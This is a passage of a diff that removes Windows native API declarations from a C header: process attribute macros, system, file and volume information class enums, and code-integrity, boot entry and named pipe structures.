-#define PS_ATTRIBUTE_GROUP_AFFINITY \
- PsAttributeValue(PsAttributeGroupAffinity, TRUE, TRUE, FALSE)
-#define PS_ATTRIBUTE_PREFERRED_NODE \
- PsAttributeValue(PsAttributePreferredNode, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_IDEAL_PROCESSOR \
- PsAttributeValue(PsAttributeIdealProcessor, TRUE, TRUE, FALSE)
-#define PS_ATTRIBUTE_UMS_THREAD \
- PsAttributeValue(PsAttributeUmsThread, TRUE, TRUE, FALSE)
-#define PS_ATTRIBUTE_MITIGATION_OPTIONS \
- PsAttributeValue(PsAttributeMitigationOptions, FALSE, TRUE, TRUE)
-#define PS_ATTRIBUTE_PROTECTION_LEVEL \
- PsAttributeValue(PsAttributeProtectionLevel, FALSE, TRUE, TRUE)
-#define PS_ATTRIBUTE_SECURE_PROCESS \
- PsAttributeValue(PsAttributeSecureProcess, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_JOB_LIST \
- PsAttributeValue(PsAttributeJobList, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_CHILD_PROCESS_POLICY \
- PsAttributeValue(PsAttributeChildProcessPolicy, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_ALL_APPLICATION_PACKAGES_POLICY \
- PsAttributeValue(PsAttributeAllApplicationPackagesPolicy, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_WIN32K_FILTER \
- PsAttributeValue(PsAttributeWin32kFilter, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_SAFE_OPEN_PROMPT_ORIGIN_CLAIM \
- PsAttributeValue(PsAttributeSafeOpenPromptOriginClaim, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_BNO_ISOLATION \
- PsAttributeValue(PsAttributeBnoIsolation, FALSE, TRUE, FALSE)
-#define PS_ATTRIBUTE_DESKTOP_APP_POLICY \
- PsAttributeValue(PsAttributeDesktopAppPolicy, FALSE, TRUE, FALSE)
-
-#define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001
-#define RTL_USER_PROC_PROFILE_USER 0x00000002
-#define RTL_USER_PROC_PROFILE_KERNEL 0x00000004
-#define RTL_USER_PROC_PROFILE_SERVER 0x00000008
-#define RTL_USER_PROC_RESERVE_1MB 0x00000020
-#define RTL_USER_PROC_RESERVE_16MB 0x00000040
-#define RTL_USER_PROC_CASE_SENSITIVE 0x00000080
-#define RTL_USER_PROC_DISABLE_HEAP_DECOMMIT 0x00000100
-#define RTL_USER_PROC_DLL_REDIRECTION_LOCAL 0x00001000
-#define RTL_USER_PROC_APP_MANIFEST_PRESENT 0x00002000
-#define RTL_USER_PROC_IMAGE_KEY_MISSING 0x00004000
-#define RTL_USER_PROC_OPTIN_PROCESS 0x00020000
-
-/*
-** Processes END
-*/
-
-typedef enum _SYSTEM_INFORMATION_CLASS {
- SystemBasicInformation = 0,
- SystemProcessorInformation = 1,
- SystemPerformanceInformation = 2,
- SystemTimeOfDayInformation = 3,
- SystemPathInformation = 4,
- SystemProcessInformation = 5,
- SystemCallCountInformation = 6,
- SystemDeviceInformation = 7,
- SystemProcessorPerformanceInformation = 8,
- SystemFlagsInformation = 9,
- SystemCallTimeInformation = 10,
- SystemModuleInformation = 11,
- SystemLocksInformation = 12,
- SystemStackTraceInformation = 13,
- SystemPagedPoolInformation = 14,
- SystemNonPagedPoolInformation = 15,
- SystemHandleInformation = 16,
- SystemObjectInformation = 17,
- SystemPageFileInformation = 18,
- SystemVdmInstemulInformation = 19,
- SystemVdmBopInformation = 20,
- SystemFileCacheInformation = 21,
- SystemPoolTagInformation = 22,
- SystemInterruptInformation = 23,
- SystemDpcBehaviorInformation = 24,
- SystemFullMemoryInformation = 25,
- SystemLoadGdiDriverInformation = 26,
- SystemUnloadGdiDriverInformation = 27,
- SystemTimeAdjustmentInformation = 28,
- SystemSummaryMemoryInformation = 29,
- SystemMirrorMemoryInformation = 30,
- SystemPerformanceTraceInformation = 31,
- SystemObsolete0 = 32,
- SystemExceptionInformation = 33,
- SystemCrashDumpStateInformation = 34,
- SystemKernelDebuggerInformation = 35,
- SystemContextSwitchInformation = 36,
- SystemRegistryQuotaInformation = 37,
- SystemExtendServiceTableInformation = 38,
- SystemPrioritySeperation = 39,
- SystemVerifierAddDriverInformation = 40,
- SystemVerifierRemoveDriverInformation = 41,
- SystemProcessorIdleInformation = 42,
- SystemLegacyDriverInformation = 43,
- SystemCurrentTimeZoneInformation = 44,
- SystemLookasideInformation = 45,
- SystemTimeSlipNotification = 46,
- SystemSessionCreate = 47,
- SystemSessionDetach = 48,
- SystemSessionInformation = 49,
- SystemRangeStartInformation = 50,
- SystemVerifierInformation = 51,
- SystemVerifierThunkExtend = 52,
- SystemSessionProcessInformation = 53,
- SystemLoadGdiDriverInSystemSpace = 54,
- SystemNumaProcessorMap = 55,
- SystemPrefetcherInformation = 56,
- SystemExtendedProcessInformation = 57,
- SystemRecommendedSharedDataAlignment = 58,
- SystemComPlusPackage = 59,
- SystemNumaAvailableMemory = 60,
- SystemProcessorPowerInformation = 61,
- SystemEmulationBasicInformation = 62,
- SystemEmulationProcessorInformation = 63,
- SystemExtendedHandleInformation = 64,
- SystemLostDelayedWriteInformation = 65,
- SystemBigPoolInformation = 66,
- SystemSessionPoolTagInformation = 67,
- SystemSessionMappedViewInformation = 68,
- SystemHotpatchInformation = 69,
- SystemObjectSecurityMode = 70,
- SystemWatchdogTimerHandler = 71,
- SystemWatchdogTimerInformation = 72,
- SystemLogicalProcessorInformation = 73,
- SystemWow64SharedInformationObsolete = 74,
- SystemRegisterFirmwareTableInformationHandler = 75,
- SystemFirmwareTableInformation = 76,
- SystemModuleInformationEx = 77,
- SystemVerifierTriageInformation = 78,
- SystemSuperfetchInformation = 79,
- SystemMemoryListInformation = 80,
- SystemFileCacheInformationEx = 81,
- SystemThreadPriorityClientIdInformation = 82,
- SystemProcessorIdleCycleTimeInformation = 83,
- SystemVerifierCancellationInformation = 84,
- SystemProcessorPowerInformationEx = 85,
- SystemRefTraceInformation = 86,
- SystemSpecialPoolInformation = 87,
- SystemProcessIdInformation = 88,
- SystemErrorPortInformation = 89,
- SystemBootEnvironmentInformation = 90,
- SystemHypervisorInformation = 91,
- SystemVerifierInformationEx = 92,
- SystemTimeZoneInformation = 93,
- SystemImageFileExecutionOptionsInformation = 94,
- SystemCoverageInformation = 95,
- SystemPrefetchPatchInformation = 96,
- SystemVerifierFaultsInformation = 97,
- SystemSystemPartitionInformation = 98,
- SystemSystemDiskInformation = 99,
- SystemProcessorPerformanceDistribution = 100,
- SystemNumaProximityNodeInformation = 101,
- SystemDynamicTimeZoneInformation = 102,
- SystemCodeIntegrityInformation = 103,
- SystemProcessorMicrocodeUpdateInformation = 104,
- SystemProcessorBrandString = 105,
- SystemVirtualAddressInformation = 106,
- SystemLogicalProcessorAndGroupInformation = 107,
- SystemProcessorCycleTimeInformation = 108,
- SystemStoreInformation = 109,
- SystemRegistryAppendString = 110,
- SystemAitSamplingValue = 111,
- SystemVhdBootInformation = 112,
- SystemCpuQuotaInformation = 113,
- SystemNativeBasicInformation = 114,
- SystemErrorPortTimeouts = 115,
- SystemLowPriorityIoInformation = 116,
- SystemBootEntropyInformation = 117,
- SystemVerifierCountersInformation = 118,
- SystemPagedPoolInformationEx = 119,
- SystemSystemPtesInformationEx = 120,
- SystemNodeDistanceInformation = 121,
- SystemAcpiAuditInformation = 122,
- SystemBasicPerformanceInformation = 123,
- SystemQueryPerformanceCounterInformation = 124,
- SystemSessionBigPoolInformation = 125,
- SystemBootGraphicsInformation = 126,
- SystemScrubPhysicalMemoryInformation = 127,
- SystemBadPageInformation = 128,
- SystemProcessorProfileControlArea = 129,
- SystemCombinePhysicalMemoryInformation = 130,
- SystemEntropyInterruptTimingInformation = 131,
- SystemConsoleInformation = 132,
- SystemPlatformBinaryInformation = 133,
- SystemPolicyInformation = 134,
- SystemHypervisorProcessorCountInformation = 135,
- SystemDeviceDataInformation = 136,
- SystemDeviceDataEnumerationInformation = 137,
- SystemMemoryTopologyInformation = 138,
- SystemMemoryChannelInformation = 139,
- SystemBootLogoInformation = 140,
- SystemProcessorPerformanceInformationEx = 141,
- SystemSpare0 = 142,
- SystemSecureBootPolicyInformation = 143,
- SystemPageFileInformationEx = 144,
- SystemSecureBootInformation = 145,
- SystemEntropyInterruptTimingRawInformation = 146,
- SystemPortableWorkspaceEfiLauncherInformation = 147,
- SystemFullProcessInformation = 148,
- SystemKernelDebuggerInformationEx = 149,
- SystemBootMetadataInformation = 150,
- SystemSoftRebootInformation = 151,
- SystemElamCertificateInformation = 152,
- SystemOfflineDumpConfigInformation = 153,
- SystemProcessorFeaturesInformation = 154,
- SystemRegistryReconciliationInformation = 155,
- SystemEdidInformation = 156,
- SystemManufacturingInformation = 157,
- SystemEnergyEstimationConfigInformation = 158,
- SystemHypervisorDetailInformation = 159,
- SystemProcessorCycleStatsInformation = 160,
- SystemVmGenerationCountInformation = 161,
- SystemTrustedPlatformModuleInformation = 162,
- SystemKernelDebuggerFlags = 163,
- SystemCodeIntegrityPolicyInformation = 164,
- SystemIsolatedUserModeInformation = 165,
- SystemHardwareSecurityTestInterfaceResultsInformation = 166,
- SystemSingleModuleInformation = 167,
- SystemAllowedCpuSetsInformation = 168,
- SystemDmaProtectionInformation = 169,
- SystemInterruptCpuSetsInformation = 170,
- SystemSecureBootPolicyFullInformation = 171,
- SystemCodeIntegrityPolicyFullInformation = 172,
- SystemAffinitizedInterruptProcessorInformation = 173,
- SystemRootSiloInformation = 174,
- SystemCpuSetInformation = 175,
- SystemCpuSetTagInformation = 176,
- SystemWin32WerStartCallout = 177,
- SystemSecureKernelProfileInformation = 178,
- SystemCodeIntegrityPlatformManifestInformation = 179,
- SystemInterruptSteeringInformation = 180,
- SystemSupportedProcessorArchitectures = 181,
- SystemMemoryUsageInformation = 182,
- SystemCodeIntegrityCertificateInformation = 183,
- SystemPhysicalMemoryInformation = 184,
- SystemControlFlowTransition = 185,
- SystemKernelDebuggingAllowed = 186,
- SystemActivityModerationExeState = 187,
- SystemActivityModerationUserSettings = 188,
- SystemCodeIntegrityPoliciesFullInformation = 189,
- SystemCodeIntegrityUnlockInformation = 190,
- SystemIntegrityQuotaInformation = 191,
- SystemFlushInformation = 192,
- SystemProcessorIdleMaskInformation = 193,
- SystemSecureDumpEncryptionInformation = 194,
- SystemWriteConstraintInformation = 195,
- SystemKernelVaShadowInformation = 196,
- SystemHypervisorSharedPageInformation = 197,
- SystemFirmwareBootPerformanceInformation = 198,
- SystemCodeIntegrityVerificationInformation = 199,
- SystemFirmwarePartitionInformation = 200,
- SystemSpeculationControlInformation = 201,
- SystemDmaGuardPolicyInformation = 202,
- SystemEnclaveLaunchControlInformation = 203,
- SystemWorkloadAllowedCpuSetsInformation = 204,
- SystemCodeIntegrityUnlockModeInformation = 205,
- SystemLeapSecondInformation = 206,
- SystemFlags2Information = 207,
- MaxSystemInfoClass
-} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
-
-//msdn.microsoft.com/en-us/library/windows/desktop/ms724509(v=vs.85).aspx
-typedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION {
- struct {
- ULONG BpbEnabled : 1;
- ULONG BpbDisabledSystemPolicy : 1;
- ULONG BpbDisabledNoHardwareSupport : 1;
- ULONG SpecCtrlEnumerated : 1;
- ULONG SpecCmdEnumerated : 1;
- ULONG IbrsPresent : 1;
- ULONG StibpPresent : 1;
- ULONG SmepPresent : 1;
- ULONG SpeculativeStoreBypassDisableAvailable : 1;
- ULONG SpeculativeStoreBypassDisableSupported : 1;
- ULONG SpeculativeStoreBypassDisabledSystemWide : 1;
- ULONG SpeculativeStoreBypassDisabledKernel : 1;
- ULONG SpeculativeStoreBypassDisableRequired : 1;
- ULONG BpbDisabledKernelToUser : 1;
- ULONG SpecCtrlRetpolineEnabled : 1;
- ULONG SpecCtrlImportOptimizationEnabled : 1;
- ULONG Reserved : 16;
- } SpeculationControlFlags;
-} SYSTEM_SPECULATION_CONTROL_INFORMATION, *PSYSTEM_SPECULATION_CONTROL_INFORMATION;
-
-typedef struct _SYSTEM_KERNEL_VA_SHADOW_INFORMATION {
- struct {
- ULONG KvaShadowEnabled : 1;
- ULONG KvaShadowUserGlobal : 1;
- ULONG KvaShadowPcid : 1;
- ULONG KvaShadowInvpcid : 1;
- ULONG KvaShadowRequired : 1;
- ULONG KvaShadowRequiredAvailable : 1;
- ULONG InvalidPteBit : 6;
- ULONG L1DataCacheFlushSupported : 1;
- ULONG L1TerminalFaultMitigationPresent : 1;
- ULONG Reserved : 18;
- } KvaShadowFlags;
-} SYSTEM_KERNEL_VA_SHADOW_INFORMATION, *PSYSTEM_KERNEL_VA_SHADOW_INFORMATION;
-
-typedef struct _SYSTEM_CODEINTEGRITY_INFORMATION {
- ULONG Length;
- ULONG CodeIntegrityOptions;
-} SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION;
-
-#define CODEINTEGRITY_OPTION_ENABLED 0x01
-#define CODEINTEGRITY_OPTION_TESTSIGN 0x02
-#define CODEINTEGRITY_OPTION_UMCI_ENABLED 0x04
-#define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED 0x08
-#define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED 0x10
-#define CODEINTEGRITY_OPTION_TEST_BUILD 0x20
-#define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD 0x40
-#define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED 0x80
-#define CODEINTEGRITY_OPTION_FLIGHT_BUILD 0x100
-#define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED 0x200
-#define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED 0x400
-#define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED 0x800
-#define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000
-#define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED 0x2000
-
-typedef VOID(NTAPI *PIO_APC_ROUTINE)(
- _In_ PVOID ApcContext,
- _In_ PIO_STATUS_BLOCK IoStatusBlock,
- _In_ ULONG Reserved
- );
-
-#define InitializeObjectAttributes( p, n, a, r, s ) { \
- (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
- (p)->RootDirectory = r; \
- (p)->Attributes = a; \
- (p)->ObjectName = n; \
- (p)->SecurityDescriptor = s; \
- (p)->SecurityQualityOfService = NULL; \
- }
-
-typedef struct _SYSTEM_VHD_BOOT_INFORMATION {
- BOOLEAN OsDiskIsVhd;
- ULONG OsVhdFilePathOffset;
- WCHAR OsVhdParentVolume[ANYSIZE_ARRAY];
-} SYSTEM_VHD_BOOT_INFORMATION, *PSYSTEM_VHD_BOOT_INFORMATION;
-
-typedef struct _SYSTEM_OBJECTTYPE_INFORMATION {
- ULONG NextEntryOffset;
- ULONG NumberOfObjects;
- ULONG NumberOfHandles;
- ULONG TypeIndex;
- ULONG InvalidAttributes;
- GENERIC_MAPPING GenericMapping;
- ULONG ValidAccessMask;
- ULONG PoolType;
- BOOLEAN SecurityRequired;
- BOOLEAN WaitableObject;
- UNICODE_STRING TypeName;
-} SYSTEM_OBJECTTYPE_INFORMATION, *PSYSTEM_OBJECTTYPE_INFORMATION;
-
-typedef struct _SYSTEM_OBJECT_INFORMATION {
- ULONG NextEntryOffset;
- PVOID Object;
- HANDLE CreatorUniqueProcess;
- USHORT CreatorBackTraceIndex;
- USHORT Flags;
- LONG PointerCount;
- LONG HandleCount;
- ULONG PagedPoolCharge;
- ULONG NonPagedPoolCharge;
- HANDLE ExclusiveProcessId;
- PVOID SecurityDescriptor;
- UNICODE_STRING NameInfo;
-} SYSTEM_OBJECT_INFORMATION, *PSYSTEM_OBJECT_INFORMATION;
-
-/*
-** Boot Entry START
-*/
-
-typedef struct _FILE_PATH {
- ULONG Version;
- ULONG Length;
- ULONG Type;
- UCHAR FilePath[ANYSIZE_ARRAY];
-} FILE_PATH, *PFILE_PATH;
-
-typedef struct _BOOT_ENTRY {
- ULONG Version;
- ULONG Length;
- ULONG Id;
- ULONG Attributes;
- ULONG FriendlyNameOffset;
- ULONG BootFilePathOffset;
- ULONG OsOptionsLength;
- UCHAR OsOptions[ANYSIZE_ARRAY];
-} BOOT_ENTRY, *PBOOT_ENTRY;
-
-typedef struct _BOOT_ENTRY_LIST {
- ULONG NextEntryOffset;
- BOOT_ENTRY BootEntry;
-} BOOT_ENTRY_LIST, *PBOOT_ENTRY_LIST;
-
-/*
-** Boot Entry END
-*/
-
-/*
-** File start
-*/
-
-#define FILE_SUPERSEDE 0x00000000
-#define FILE_OPEN 0x00000001
-#define FILE_CREATE 0x00000002
-#define FILE_OPEN_IF 0x00000003
-#define FILE_OVERWRITE 0x00000004
-#define FILE_OVERWRITE_IF 0x00000005
-#define FILE_MAXIMUM_DISPOSITION 0x00000005
-
-#define FILE_DIRECTORY_FILE 0x00000001
-#define FILE_WRITE_THROUGH 0x00000002
-#define FILE_SEQUENTIAL_ONLY 0x00000004
-#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008
-
-#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010
-#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
-#define FILE_NON_DIRECTORY_FILE 0x00000040
-#define FILE_CREATE_TREE_CONNECTION 0x00000080
-
-#define FILE_COMPLETE_IF_OPLOCKED 0x00000100
-#define FILE_NO_EA_KNOWLEDGE 0x00000200
-#define FILE_OPEN_FOR_RECOVERY 0x00000400
-#define FILE_RANDOM_ACCESS 0x00000800
-
-#define FILE_DELETE_ON_CLOSE 0x00001000
-#define FILE_OPEN_BY_FILE_ID 0x00002000
-#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000
-#define FILE_NO_COMPRESSION 0x00008000
-
-#define FILE_RESERVE_OPFILTER 0x00100000
-#define FILE_OPEN_REPARSE_POINT 0x00200000
-#define FILE_OPEN_NO_RECALL 0x00400000
-#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000
-
-
-#define FILE_COPY_STRUCTURED_STORAGE 0x00000041
-#define FILE_STRUCTURED_STORAGE 0x00000441
-
-#define FILE_VALID_OPTION_FLAGS 0x00ffffff
-#define FILE_VALID_PIPE_OPTION_FLAGS 0x00000032
-#define FILE_VALID_MAILSLOT_OPTION_FLAGS 0x00000032
-#define FILE_VALID_SET_FLAGS 0x00000036
-
-typedef enum _FILE_INFORMATION_CLASS {
- FileDirectoryInformation = 1,
- FileFullDirectoryInformation,
- FileBothDirectoryInformation,
- FileBasicInformation,
- FileStandardInformation,
- FileInternalInformation,
- FileEaInformation,
- FileAccessInformation,
- FileNameInformation,
- FileRenameInformation,
- FileLinkInformation,
- FileNamesInformation,
- FileDispositionInformation,
- FilePositionInformation,
- FileFullEaInformation,
- FileModeInformation,
- FileAlignmentInformation,
- FileAllInformation,
- FileAllocationInformation,
- FileEndOfFileInformation,
- FileAlternateNameInformation,
- FileStreamInformation,
- FilePipeInformation,
- FilePipeLocalInformation,
- FilePipeRemoteInformation,
- FileMailslotQueryInformation,
- FileMailslotSetInformation,
- FileCompressionInformation,
- FileObjectIdInformation,
- FileCompletionInformation,
- FileMoveClusterInformation,
- FileQuotaInformation,
- FileReparsePointInformation,
- FileNetworkOpenInformation,
- FileAttributeTagInformation,
- FileTrackingInformation,
- FileIdBothDirectoryInformation,
- FileIdFullDirectoryInformation,
- FileValidDataLengthInformation,
- FileShortNameInformation,
- FileIoCompletionNotificationInformation,
- FileIoStatusBlockRangeInformation,
- FileIoPriorityHintInformation,
- FileSfioReserveInformation,
- FileSfioVolumeInformation,
- FileHardLinkInformation,
- FileProcessIdsUsingFileInformation,
- FileNormalizedNameInformation,
- FileNetworkPhysicalNameInformation,
- FileIdGlobalTxDirectoryInformation,
- FileIsRemoteDeviceInformation,
- FileUnusedInformation,
- FileNumaNodeInformation,
- FileStandardLinkInformation,
- FileRemoteProtocolInformation,
- FileRenameInformationBypassAccessCheck,
- FileLinkInformationBypassAccessCheck,
- FileVolumeNameInformation,
- FileIdInformation,
- FileIdExtdDirectoryInformation,
- FileReplaceCompletionInformation,
- FileHardLinkFullIdInformation,
- FileIdExtdBothDirectoryInformation,
- FileDispositionInformationEx,
- FileRenameInformationEx,
- FileRenameInformationExBypassAccessCheck,
- FileDesiredStorageClassInformation,
- FileStatInformation,
- FileMemoryPartitionInformation,
- FileStatLxInformation,
- FileCaseSensitiveInformation,
- FileMaximumInformation
-} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
-
-typedef enum _FSINFOCLASS {
- FileFsVolumeInformation = 1,
- FileFsLabelInformation,
- FileFsSizeInformation,
- FileFsDeviceInformation,
- FileFsAttributeInformation,
- FileFsControlInformation,
- FileFsFullSizeInformation,
- FileFsObjectIdInformation,
- FileFsDriverPathInformation,
- FileFsVolumeFlagsInformation,
- FileFsSectorSizeInformation,
- FileFsDataCopyInformation,
- FileFsMetadataSizeInformation,
- FileFsMaximumInformation
-} FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS;
-
-typedef struct _FILE_BASIC_INFORMATION {
- LARGE_INTEGER CreationTime;
- LARGE_INTEGER LastAccessTime;
- LARGE_INTEGER LastWriteTime;
- LARGE_INTEGER ChangeTime;
- ULONG FileAttributes;
-} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
-
-typedef struct _FILE_STANDARD_INFORMATION {
- LARGE_INTEGER AllocationSize;
- LARGE_INTEGER EndOfFile;
- ULONG NumberOfLinks;
- UCHAR DeletePending;
- UCHAR Directory;
-} FILE_STANDARD_INFORMATION;
-
-typedef struct _FILE_STANDARD_INFORMATION_EX {
- LARGE_INTEGER AllocationSize;
- LARGE_INTEGER EndOfFile;
- ULONG NumberOfLinks;
- BOOLEAN DeletePending;
- BOOLEAN Directory;
- BOOLEAN AlternateStream;
- BOOLEAN MetadataAttribute;
-} FILE_STANDARD_INFORMATION_EX, *PFILE_STANDARD_INFORMATION_EX;
-
-typedef struct _FILE_INTERNAL_INFORMATION {
- LARGE_INTEGER IndexNumber;
-} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION;
-
-typedef struct _FILE_EA_INFORMATION {
- ULONG EaSize;
-} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION;
-
-typedef struct _FILE_ACCESS_INFORMATION {
- ACCESS_MASK AccessFlags;
-} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION;
-
-typedef struct _FILE_POSITION_INFORMATION {
- LARGE_INTEGER CurrentByteOffset;
-} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION;
-
-typedef struct _FILE_MODE_INFORMATION {
- ULONG Mode;
-} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION;
-
-typedef struct _FILE_ALIGNMENT_INFORMATION {
- ULONG AlignmentRequirement;
-} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION;
-
-typedef struct _FILE_NAME_INFORMATION {
- ULONG FileNameLength;
- WCHAR FileName[1];
-} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;
-
-typedef struct _FILE_ALL_INFORMATION {
- FILE_BASIC_INFORMATION BasicInformation;
- FILE_STANDARD_INFORMATION StandardInformation;
- FILE_INTERNAL_INFORMATION InternalInformation;
- FILE_EA_INFORMATION EaInformation;
- FILE_ACCESS_INFORMATION AccessInformation;
- FILE_POSITION_INFORMATION PositionInformation;
- FILE_MODE_INFORMATION ModeInformation;
- FILE_ALIGNMENT_INFORMATION AlignmentInformation;
- FILE_NAME_INFORMATION NameInformation;
-} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION;
-
-typedef struct _FILE_NETWORK_OPEN_INFORMATION {
- LARGE_INTEGER CreationTime;
- LARGE_INTEGER LastAccessTime;
- LARGE_INTEGER LastWriteTime;
- LARGE_INTEGER ChangeTime;
- LARGE_INTEGER AllocationSize;
- LARGE_INTEGER EndOfFile;
- ULONG FileAttributes;
-} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;
-
-typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION {
- ULONG FileAttributes;
- ULONG ReparseTag;
-} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION;
-
-typedef struct _FILE_ALLOCATION_INFORMATION {
- LARGE_INTEGER AllocationSize;
-} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION;
-
-typedef struct _FILE_COMPRESSION_INFORMATION {
- LARGE_INTEGER CompressedFileSize;
- USHORT CompressionFormat;
- UCHAR CompressionUnitShift;
- UCHAR ChunkShift;
- UCHAR ClusterShift;
- UCHAR Reserved[3];
-} FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION;
-
-typedef struct _FILE_DISPOSITION_INFORMATION {
- BOOLEAN DeleteFile;
-} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION;
-
-typedef struct _FILE_END_OF_FILE_INFORMATION {
- LARGE_INTEGER EndOfFile;
-} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION;
-
-typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION {
- LARGE_INTEGER ValidDataLength;
-} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION;
-
-typedef struct _FILE_LINK_INFORMATION {
- BOOLEAN ReplaceIfExists;
- HANDLE RootDirectory;
- ULONG FileNameLength;
- WCHAR FileName[1];
-} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;
-
-typedef struct _FILE_MOVE_CLUSTER_INFORMATION {
- ULONG ClusterCount;
- HANDLE RootDirectory;
- ULONG FileNameLength;
- WCHAR FileName[1];
-} FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION;
-
-typedef struct _FILE_RENAME_INFORMATION {
- BOOLEAN ReplaceIfExists;
- HANDLE RootDirectory;
- ULONG FileNameLength;
- WCHAR FileName[1];
-} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;
-
-typedef struct _FILE_STREAM_INFORMATION {
- ULONG NextEntryOffset;
- ULONG StreamNameLength;
- LARGE_INTEGER StreamSize;
- LARGE_INTEGER StreamAllocationSize;
- WCHAR StreamName[1];
-} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION;
-
-typedef struct _FILE_TRACKING_INFORMATION {
- HANDLE DestinationFile;
- ULONG ObjectInformationLength;
- CHAR ObjectInformation[1];
-} FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION;
-
-typedef struct _FILE_COMPLETION_INFORMATION {
- HANDLE Port;
- PVOID Key;
-} FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION;
-
-//
-// Define the NamedPipeType flags for NtCreateNamedPipeFile
-//
-
-#define FILE_PIPE_BYTE_STREAM_TYPE 0x00000000
-#define FILE_PIPE_MESSAGE_TYPE 0x00000001
-
-//
-// Define the CompletionMode flags for NtCreateNamedPipeFile
-//
-
-#define FILE_PIPE_QUEUE_OPERATION 0x00000000
-#define FILE_PIPE_COMPLETE_OPERATION 0x00000001
-
-//
-// Define the ReadMode flags for NtCreateNamedPipeFile
-//
-
-#define FILE_PIPE_BYTE_STREAM_MODE 0x00000000
-#define FILE_PIPE_MESSAGE_MODE 0x00000001
-
-//
-// Define the NamedPipeConfiguration flags for NtQueryInformation
-//
-
-#define FILE_PIPE_INBOUND 0x00000000
-#define FILE_PIPE_OUTBOUND 0x00000001
-#define FILE_PIPE_FULL_DUPLEX 0x00000002
-
-//
-// Define the NamedPipeState flags for NtQueryInformation
-//
-
-#define FILE_PIPE_DISCONNECTED_STATE 0x00000001
-#define FILE_PIPE_LISTENING_STATE 0x00000002
-#define FILE_PIPE_CONNECTED_STATE 0x00000003
-#define FILE_PIPE_CLOSING_STATE 0x00000004
-
-//
-// Define the NamedPipeEnd flags for NtQueryInformation
-//
-
-#define FILE_PIPE_CLIENT_END 0x00000000
-#define FILE_PIPE_SERVER_END 0x00000001
-
-
-typedef struct _FILE_PIPE_INFORMATION {
- ULONG ReadMode;
- ULONG CompletionMode;
-} FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION;
-
-typedef struct _FILE_PIPE_LOCAL_INFORMATION {
- ULONG NamedPipeType;
- ULONG NamedPipeConfiguration;
- ULONG MaximumInstances;
- ULONG CurrentInstances;
- ULONG InboundQuota;
- ULONG ReadDataAvailable;
- ULONG OutboundQuota;
- ULONG WriteQuotaAvailable;
- ULONG NamedPipeState;
- ULONG NamedPipeEnd;
-} FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION;
-
-typedef struct _FILE_PIPE_REMOTE_INFORMATION {
- LARGE_INTEGER CollectDataTime;
- ULONG MaximumCollectionCount;
-} FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION;
-
-typedef struct _FILE_MAILSLOT_QUERY_INFORMATION {
- ULONG MaximumMessageSize;
- ULONG MailslotQuota;
- ULONG NextMessageSize;
- ULONG MessagesAvailable;
- LARGE_INTEGER ReadTimeout;
-} FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION;
-
-typedef struct _FILE_MAILSLOT_SET_INFORMATION {
- PLARGE_INTEGER ReadTimeout;
-} FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION;
-
